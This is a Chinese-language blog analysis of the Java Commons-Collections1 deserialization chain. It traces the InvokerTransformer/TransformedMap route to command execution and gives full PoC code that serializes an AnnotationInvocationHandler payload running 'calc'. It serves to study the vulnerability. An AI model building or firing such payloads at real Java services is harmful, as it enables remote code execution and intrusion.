2. 程式人生 > >java反序列化Commons-Collections1分析

java反序列化Commons-Collections1分析

阿新 發佈:2018-12-30

Commons-Collections1也是利用InvokerTransformer類中的transform方法反射機制執行命令。實驗用的是commons-collections 3.1這裡說一下為什麼呼叫構造elEntry.setValue("hahah");就會彈計算器。poc前一步需要理解如下程式碼:

package com.imooc.bigdata.datafile;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.util.HashMap;
import java.util.Map;

public class Test1 {
    public static void main(String[] args)
    {
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] { String.class }, new Object[] { "calc" }) };
        Transformer transformerChain = new ChainedTransformer(transformers);

        Map innermap = new HashMap();
        innermap.put("name", "hello");
        Map outmap = TransformedMap.decorate(innermap, null, transformerChain);
        Map.Entry elEntry = ( Map.Entry ) outmap.entrySet().iterator().next();
        elEntry.setValue("hahah");
    }
}

在setValue下斷點除錯:
Alt text
F7跟進,呼叫了checkSetValue方法:
Alt text
F7跟進,就會跳到TransformedMap類的checkSetValue方法。
Alt text
繼續F7呼叫Transform方法
Alt text
繼續跟就會來到我們命令執行的transform方法中。最終導致RCE。
Alt text
以上就是為什麼呼叫setValue會觸發RCE。
繼續找一個類滿足如下條件就能觸發反序列化漏洞:

(1)使用了InvokeTransformer的物件,並在transform方法裡執行程式碼;
(2)使用TransformedMap通過執行setValue方法來觸發transform方法。

這時候就找到AnnotationInvocationHandler這個類,這個類的readObject方法就存在setValue方法觸發RCE
最終的Poc如下:

package com.imooc.bigdata.datafile;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
public class Test {
    public static Object Reverse_Payload() throws Exception {
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] { String.class }, new Object[] { "calc" }) };
        Transformer transformerChain = new ChainedTransformer(transformers);

        Map innermap = new HashMap();
        innermap.put("value", "value");
        Map outmap = TransformedMap.decorate(innermap, null, transformerChain);
        //通過反射獲得AnnotationInvocationHandler類物件
        Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        //通過反射獲得cls的建構函式
        Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class);
        //這裡需要設定Accessible為true,否則序列化失敗
        ctor.setAccessible(true);
        //通過newInstance()方法例項化物件
        Object instance = ctor.newInstance(Retention.class, outmap);
        return instance;
    }

    public static void main(String[] args) throws Exception {
        GeneratePayload(Reverse_Payload(),"obj");
        payloadTest("obj");
    }
    public static void GeneratePayload(Object instance, String file)
            throws Exception {
        //將構造好的payload序列化後寫入檔案中
        File f = new File(file);
        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
        out.writeObject(instance);
        out.flush();
        out.close();
    }
    public static void payloadTest(String file) throws Exception {
        //讀取寫入的payload,並進行反序列化
        ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
        in.readObject();
        in.close();
    }
}

除錯下,293行呼叫setValue方法。
Alt text
執行呼叫棧的過程如下圖。說一下需要看執行棧情況的時候,可以在Runtime類的exec方法打個斷點,彈計算器的時候就是RCE執行完了。
Alt text

參考文章:
https://blog.chaitin.cn/2015-11-11_java_unserialize_rce/#h3_%E5%88%A9%E7%94%A8apache-commons-collections%E5%AE%9E%E7%8E%B0%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C
https://paper.seebug.org/312/#6-java-apache-commonscollections-rce

相關推薦

java序列Commons-Collections1分析

Commons-Collections1也是利用InvokerTransformer類中的transform方法反射機制執行命令。實驗用的是commons-collections 3.1這裡說一下為什麼呼叫構造elEntry.setValue("hahah");就會彈計算器。poc前一步需要理解如下程式碼:

java序列-ysoserial-除錯分析總結篇(2)

前言: 這篇主要分析commonCollections2,呼叫鏈如下圖所示: 呼叫鏈分析: 分析環境:jdk1.8.0  反序列化的入口點為src.zip!/java/util/PriorityQueue.java  此時將會對佇列呼叫siftdown函式,其中佇列中包含了兩個元素,

java序列-ysoserial-除錯分析總結篇(3)

前言: 這篇文章主要分析commoncollections3,這條利用鏈如yso描述,這個與cc1類似,只是反射呼叫方法是用的不是invokeTransformer而用的是InstantiateTransformer,整個呼叫過程如下圖 利用鏈分析: 如上圖所示,入口點還是Annotationinvoa

java序列-ysoserial-除錯分析總結篇(6)

前言: 這篇記錄CommonsCollections6的除錯,外層也是新的類,換成了hashset,即從hashset觸發其readObject(),yso給的呼叫鏈如下圖所示 利用鏈分析: 首先在hashset內部首先獲取器容量與負載因子等操作,然後建立hashmap,將ObjectinputStrea

java序列-ysoserial-除錯分析總結篇(7)

前言: CommonsCollections7外層也是一條新的構造鏈,外層由hashtable的readObject進入,這條構造鏈挺有意思,因為用到了hash碰撞 yso構造分析: 首先構造進行rce所需要的轉換鏈,這裡也用的是chianed裡面套Constantrans+invoketrans的方法

關於metaspolit中進行JAVA序列滲透RMI的原理分析

resp format shel git led 技術 文件 error: return 一、背景: 這裏需要對java反序列化有點了解,在這裏得推廣下自己的博客嘛,雖然寫的不好,廣告還是要做的。原諒我: 1、java反序列化漏洞原理研習 2、java反序列化漏洞的檢測 二

Java序列漏洞分析

https://xz.aliyun.com/t/136  寫的挺詳細的,大致瞭解了,整個流程,有點事,之後在細跟 目錄 1. 背景 2. 認識java序列化與反序列化 3. 理解漏洞的產生 4. POC構造 5. 實際漏洞環境測試 6. 總結 背景   2015年11月

懸鏡安全丨Java 序列任意程式碼執行漏洞分析與利用

本文首發平臺:懸鏡官網,如需轉載,請聯絡小編,謝謝。        2015年的1月28號,Gabriel Lawrence (@gebl)和Chris Frohoff (@frohoff)在AppSecCali上給出了一個報告[3],報告中介紹了Java反序列化漏洞可以利用Apache Commons

java序列——apache-shiro復現分析

本文首發於“合天智匯”公眾號 作者:Fortheone 看了好久的文章才開始分析除錯java的cc鏈,這個鏈算是java反序列化漏洞裡的基礎了。分析除錯的shiro也是直接使用了cc鏈。首先先了解一些java的反射機制。 一、什麼是反射: 反射是Java的特徵之一,是一種間接操作目標物件的機制,核心

java序列漏洞的檢測

spa div ria comm span Coding python odin ima 1、首先下載常用的工具ysoserial 這邊提供下載地址:https://jitpack.io/com/github/frohoff/ysoserial/master-v0.0.5-

java序列漏洞原理研習

java程序 out import 修改 sed 判斷 pub 發現 commons 零、Java反序列化漏洞   java的安全問題首屈一指的就是反序列化漏洞,可以執行命令啊,甚至直接getshell,所以趁著這個假期好好研究一下java的反序列化漏洞。另外呢,組裏多位大

Java序列漏洞的挖掘、攻擊與防禦

body per 所有 http 操作 www except ride 方法 一、Java反序列化漏洞的挖掘 1、黑盒流量分析: 在Java反序列化傳送的包中,一般有兩種傳送方式,在TCP報文中,一般二進制流方式傳輸,在HTTP報文中,則大多以base64傳輸。因而在流量中

序列序列技術的分析和選擇

dia 效率 個性化 擴展 綁定 嵌入 成熟 內存 字段 轉自:https://tech.meituan.com/serialization_vs_deserialization.html 美團點評技術團隊的文章 #摘要序列化和反序列化幾乎是工程師們每天都要面對的事情,但是

java序列原理-Demo(一)

51cto n) www. fault clas ack 保存 發現 auto java反序列化原理-Demo(一) 0x00 什麽是java序列化和反序列? Java 序列化是指把 Java 對象轉換為字節序列的過程便於保存在內存、文件、數據庫中,ObjectOutput

java序列原理-Demo(二)

mage ins bytearray stream utc 繼承 etc input exceptio java反序列化原理-Demo(二) 0x00 測試代碼以及運行結果 測試代碼: package test; import java.io.ByteArrayInput

java序列 - Transformer類可以執行惡意代碼的原理

write bject calc == return cal leg invoke stack java反序列化 - Transformer類可以執行惡意代碼的原理 0x00 代碼 Transformer[] transformers = new Transformer[]

java序列 - transformedMap類可以執行惡意代碼的原理

clas invoke 序列化 pri [] nag roc map.entry 什麽 java反序列化 - transformedMap類可以執行惡意代碼的原理 0x00 代碼 Map map=new HashMap(); map.put("key","

第九屆極客大挑戰——怎麼又是江師傅的祕密(java序列

引言:因為太想加入三葉草了,所以極客大挑戰這段時間一直在努力的學習,原來還真沒想到能在比賽中拿到排行榜第一的成績,不過現在看來努力始終都是有回報的。但我依然還是比較菜啊-.-,最近卻有很多夥伴加我好友,一來就叫我大佬,讓我深感有愧-.-,既然都想看我wp,那我就挑幾道題寫寫好了,口拙詞劣還望見諒。

Java序列漏洞:在受限環境中從漏洞發現到獲取反向Shell

前言 Java反序列化漏洞可以說是Java安全的一塊心病,近年來更是在安全界“出盡風頭”。其實說到Java反序列化的問題,早在2015年年初的在AppSecCali大會上,兩名安全研究人員Chris Frohoff 和 Gabriel Lawrence發表了一篇題為《Marshallin

Java序列之Jackson-databind

這個洞的cve編號:CVE-2017-17485,漏洞環境就如第一個連結那樣,jdk需要在jdk 1.8以上。 先看一下Jackson-databind的用法,說白了就是將json轉換成物件。 test-legit.json程式碼如下 {"id":123} 執行結果如圖: 如果注入的json程式碼如下程